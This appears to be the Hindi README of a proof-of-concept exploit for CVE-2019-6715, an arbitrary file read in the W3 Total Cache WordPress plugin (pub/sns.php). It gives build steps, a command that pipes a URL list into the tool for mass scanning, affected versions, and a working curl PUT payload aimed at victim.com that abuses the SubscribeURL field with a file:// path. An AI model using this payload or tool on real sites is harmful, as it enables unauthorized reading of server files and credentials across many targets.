
CVE-2019-6715 के लिए PoC एक्सप्लॉइट: W3 Total Cache WordPress प्लगइन में तैयार किए गए SubscriptionConfirmation JSON के माध्यम से मनमाना फ़ाइल पढ़ना। पाइप किए गए URL सूची का उपयोग करके कमजोर सर्वरों से फ़ाइलें पढ़ता है।
go get github.com/fatih/color
go build
cat list.txt | ./2019-6715
सभी असुरक्षित URLs text.log में लॉग होते हैं
विवरण: WordPress के लिए W3 Total Cache प्लगइन के 0.9.4 से पहले संस्करण में pub/sns.php रिमोट हमलावरों को SubscriptionConfirmation JSON डेटा में SubscribeURL फ़ील्ड के माध्यम से मनमानी फ़ाइलें पढ़ने की अनुमति देता है।
भेद्यता प्रकार: मनमानी फ़ाइल पढ़ना
उत्पाद विक्रेता: Frederick Townes द्वारा Wordpress W3 Total Cache प्लगइन
प्रभावित उत्पाद कोड बेस: W3 Total Cache - 0.9.2.6 - 0.9.3, 0.9.4 में ठीक किया गया
प्रभावित घटक: प्रभावित सोर्स कोड फ़ाइल: w3-total-cache/pub/sns.php
curl -X PUT --data '{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"file://file_path"}' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36' http://victim.com/wp-content/plugins/w3-total-cache/pub/sns.php